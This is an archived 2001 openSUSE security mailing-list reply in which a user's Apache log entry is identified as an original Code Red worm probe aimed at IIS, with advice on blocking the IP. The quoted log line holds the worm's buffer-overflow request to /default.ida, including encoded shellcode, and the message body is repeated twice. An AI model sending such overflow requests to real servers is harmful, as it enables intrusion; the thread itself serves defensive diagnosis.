Mailinglist Archive: opensuse-security (670 mails)
| < Previous | Next > |
Re: [suse-security] strage log entry
- From: Sven Michels <smichels@xxxxxxxxxxxx>
- Date: Tue, 13 Nov 2001 10:52:59 +0100
- Message-id: <3BF0ED7A.B3501337@xxxxxxxxxxxx>
Marcus Birkin wrote:
>
> Hi
>
> Thats code red or nimda, I forget which one..
> This is only a problem if you running IIS ;)
Code Red (Original Version).
> > i found this on my access_log file. what are they looking for ? is this an
> > attack ?
> >
> > 211.90.239.179 - - [12/Nov/2001:18:21:16 +0100] "GET
> >
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> >
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> >
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> >
> NNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
> > u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0"
> > 400 329
> >
> > i put this IP on my host.deny file. is this enought ?
nafaik, httpd doesn't look at it. deny it via ipchains/iptables
but you don't need to do that (because it's an attack on IIS).
--
intraDAT AG http://www.intradat.com
Wilhelm-Leuschner-Strasse 7 Tel: +49 69-25629-0
D - 60329 Frankfurt am Main Fax: +49 69-25629-256
Junk mail is war. RFCs do not apply.
>
> Hi
>
> Thats code red or nimda, I forget which one..
> This is only a problem if you running IIS ;)
Code Red (Original Version).
> > i found this on my access_log file. what are they looking for ? is this an
> > attack ?
> >
> > 211.90.239.179 - - [12/Nov/2001:18:21:16 +0100] "GET
> >
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> >
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> >
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> >
> NNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
> > u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0"
> > 400 329
> >
> > i put this IP on my host.deny file. is this enought ?
nafaik, httpd doesn't look at it. deny it via ipchains/iptables
but you don't need to do that (because it's an attack on IIS).
--
intraDAT AG http://www.intradat.com
Wilhelm-Leuschner-Strasse 7 Tel: +49 69-25629-0
D - 60329 Frankfurt am Main Fax: +49 69-25629-256
Junk mail is war. RFCs do not apply.
| < Previous | Next > |